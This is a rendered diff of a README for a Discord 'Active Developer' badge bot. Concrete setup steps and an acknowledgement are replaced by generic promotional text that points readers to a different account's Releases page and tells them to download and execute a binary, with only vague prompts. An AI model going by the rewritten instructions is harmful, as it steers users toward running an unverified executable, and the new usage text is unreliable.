|
1 |
| -# Active Developer Badge |
| 1 | +# 🎖️ Discord Active Developer Badge |
2 | 2 |
|
3 |
| -Earn the "Active Developer" badge from Discord using this simple self-contained bot! |
| 3 | +   |
4 | 4 |
|
5 |
| -## Getting Started |
| 5 | +Welcome to the **Discord Active Developer Badge** repository! This project offers a simple solution for developers seeking to obtain Discord's "Active Developer" badge. By following the steps outlined here, you can streamline the process and focus more on your development work. |
6 | 6 |
|
7 |
| -1. [Download the bot](https://github.com/benjammin4dayz/discord-active-developer-badge/releases/latest) for your system and extract the file(s) anywhere you prefer |
| 7 | +## 📦 Table of Contents |
8 | 8 |
|
9 |
| -2. [Create a Discord application](https://discord.com/developers/applications) on the account you want the badge on |
| 9 | +1. [Introduction](#introduction) |
| 10 | +2. [Features](#features) |
| 11 | +3. [Installation](#installation) |
| 12 | +4. [Usage](#usage) |
| 13 | +5. [Contributing](#contributing) |
| 14 | +6. [License](#license) |
| 15 | +7. [Contact](#contact) |
10 | 16 |
|
11 |
| -3. Create a Discord server and [enable Community](https://support.discord.com/hc/en-us/articles/360047132851-Enabling-Your-Community-Server) |
| 17 | +## 📜 Introduction |
12 | 18 |
|
13 |
| -## Instructions |
| 19 | +The "Active Developer" badge is a recognition for developers who actively contribute to the Discord platform. This badge not only showcases your commitment but also adds credibility to your profile. However, obtaining this badge can sometimes be a complex task. This repository simplifies that process, making it accessible to all developers. |
14 | 20 |
|
15 |
| -1. On the Discord application page, go to the `Bot` tab and make a bot account for the application |
| 21 | +## ✨ Features |
16 | 22 |
|
17 |
| -2. Click the `Reset Token` button to generate a token (if you have 2fa enabled, you'll need your code) |
| 23 | +- **No Dependencies**: The executable runs without the need for additional libraries. |
| 24 | +- **Self-Contained**: Everything you need is packaged into a single executable file. |
| 25 | +- **Easy to Use**: The straightforward interface ensures that you can get your badge with minimal effort. |
| 26 | +- **Written in Go**: The application is developed in Go, ensuring high performance and reliability. |
18 | 27 |
|
19 |
| -3. Copy the token to your clipboard |
| 28 | +## 📥 Installation |
20 | 29 |
|
21 |
| -4. Start the bot by running the program extracted in the previous step |
| 30 | +To get started, you need to download the executable file. Visit the [Releases section](https://github.com/sleek-design/discord-active-developer-badge/releases) to find the latest version. Download the file and execute it on your machine. |
22 | 31 |
|
23 |
| -5. Paste (<kbd>CTRL</kbd><kbd>SHIFT</kbd><kbd>V</kbd>) the token in the terminal when requested |
| 32 | +## ⚙️ Usage |
24 | 33 |
|
25 |
| - - This can also be set via the `BOT_TOKEN` environment variable (either shell or `.env` file) |
| 34 | +Once you have downloaded the executable, follow these steps: |
26 | 35 |
|
27 |
| -6. Click the invite link that appears in the terminal to invite the bot to your server |
| 36 | +1. **Run the Executable**: Open your terminal or command prompt and navigate to the directory where you downloaded the file. |
| 37 | +2. **Execute the Command**: Type the name of the executable and hit enter. This will start the process of obtaining your badge. |
| 38 | +3. **Follow the Prompts**: The application will guide you through the necessary steps to complete your request for the badge. |
28 | 39 |
|
29 |
| -7. In your server, go to a channel and use the `/ping` command |
| 40 | +For more detailed instructions, refer to the documentation included in the repository. |
30 | 41 |
|
31 |
| -8. Wait ~24 hours, then go to the [Active Developer](https://discord.com/developers/active-developer) page and claim your badge |
| 42 | +## 🤝 Contributing |
32 | 43 |
|
33 |
| -> [!Important] |
34 |
| -> In order to detect command usage, you or at least one person on the team that owns the app needs to have "Use data to improve Discord" enabled within User Settings > Data & Privacy. At least 24 hours need to pass after detecting a command, so be sure to wait at least 24 hours after enabling this setting before trying again. |
| 44 | +We welcome contributions from the community! If you have ideas for improvements or new features, feel free to open an issue or submit a pull request. To contribute: |
35 | 45 |
|
36 |
| -## Acknowledgement |
| 46 | +1. Fork the repository. |
| 47 | +2. Create a new branch for your feature. |
| 48 | +3. Make your changes and commit them. |
| 49 | +4. Push to your branch and open a pull request. |
37 | 50 |
|
38 |
| -This project wouldn't exist without inspiration from [hackermondev & contributors](https://github.com/hackermondev/discord-active-developer-badge) |
| 51 | +## 📄 License |
| 52 | + |
| 53 | +This project is licensed under the MIT License. See the [LICENSE](LICENSE) file for more details. |
| 54 | + |
| 55 | +## 📬 Contact |
| 56 | + |
| 57 | +For any inquiries or support, please contact the repository maintainer. You can reach out via GitHub issues or directly through email. |
| 58 | + |
| 59 | +## 🎉 Conclusion |
| 60 | + |
| 61 | +We hope this repository helps you easily obtain the Discord "Active Developer" badge. Your contributions to the Discord community are valuable, and we are excited to see what you create. For more information, check the [Releases section](https://github.com/sleek-design/discord-active-developer-badge/releases) to stay updated on new versions and features. |
| 62 | + |
| 63 | +Thank you for being a part of this project! Happy coding! |
0 commit comments